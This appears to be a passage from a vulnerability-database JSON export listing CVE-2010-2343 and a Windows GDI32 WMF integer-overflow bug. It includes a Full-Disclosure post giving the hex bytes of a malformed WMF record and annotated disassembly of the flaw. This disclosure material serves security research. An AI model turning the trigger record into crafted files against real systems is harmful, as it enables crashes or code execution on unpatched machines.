"Stack-based buffer overflow in D.R. Software Audio Converter 8.1, 2007, and 8.05 allows remote attackers to execute arbitrary code via a crafted pls playlist file.", "modified": "2017-08-16T21:32:42", "published": "2010-06-21T11:30:03", "id": "CVE-2010-2343", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2343", "title": "CVE-2010-2343", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:21", "bulletinFamily": "software", "description": "CreateBrushInderect integer overflow on WMF files parsing.", "modified": "2006-08-07T00:00:00", "published": "2006-08-07T00:00:00", "id": "SECURITYVULNS:VULN:6455", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:6455", "title": "Microsoft Windows GDI32 library integer overflow", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:18", "bulletinFamily": "software", "description": "\r\nThere is some details for wannabees :)\r\n\r\n1. 'Bad' wmf record:\r\n\r\n07 00 00 00\r\n\r\nlength of record (in words)\r\n\r\nFC 02\r\n\r\ntype (CreateBrushIndirect)\r\n\r\n08 00 00 00 00 00 00 80\r\n\r\n'packed' (good old Win16 days) LOGBRUSH data:\r\n\r\n08 00 - 'packed' lpStyle (may be BS_DIBPATTERNPT [6] or BS_DIBPATTERN8X8 [8])\r\n00 00 00 00 - COLORREF (any)\r\n00 80 - 'packed' lbHatch (any, signed)\r\n\r\n2. Sign extension bug:\r\n\r\n _CommonEnumMetaFile:\r\n ......\r\n ; normalize 'packed' LOGBRUSH\r\n movzx eax, word ptr [ebx+6] ; lbStyle (UINT32(UINT16))\r\n mov [ebp-0f8], eax\r\n mov eax, [ebx + 8] ; COLORREF (as is)\r\n mov [ebp-0f4], eax\r\n movsx eax, word ptr [ebx+0c] ; <-- BUGBUG: lbHatch (UINT32(INT16))\r\n lea eax, [ebp-0f8]\r\n push eax\r\n call _CreateBrushIndirect\r\n ......\r\n\r\n3. Memory access to fake 'pointer to packed DIB' (lbHatch) bug:\r\n\r\n cmp edi, 6 ; BS_DIBPATTERNPT == lbStyle\r\n jz _go2crush\r\n ......\r\n cmp edi, 8 ; BS_DIBPATTERN8X8 == lbStyle\r\n jz _go2crush\r\n ......\r\n_go2crush:\r\n push esi\r\n push 1\r\n push eax, [ebp+10]\r\n push eax\r\n push dword ptr [ebp+0c] ; 1\r\n push dword ptr [ebp+18] ; lpHatch (fake *packedDIB)\r\n call _pbmiConvertInfo\r\n ......\r\n ......\r\n_pbmiConvertInfo:\r\n ......\r\n push ebx\r\n mov ebx, [ebp+8] ; lpHatch (fake *packedDIB)\r\n ......\r\n mov eax, [ebx] ; <-- BUGBUG: crush or random (in first 0x7f00 bytes)\r\n ; memory access (see @ 0x3000 region)\r\n\r\n\r\ngood luck,\r\ncyanid-E\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "modified": "2006-08-07T00:00:00", "published": "2006-08-07T00:00:00", "id": "SECURITYVULNS:DOC:13763", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13763", "title": "[Full-disclosure] 0-day XP SP2 wmf exploit (some details)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}
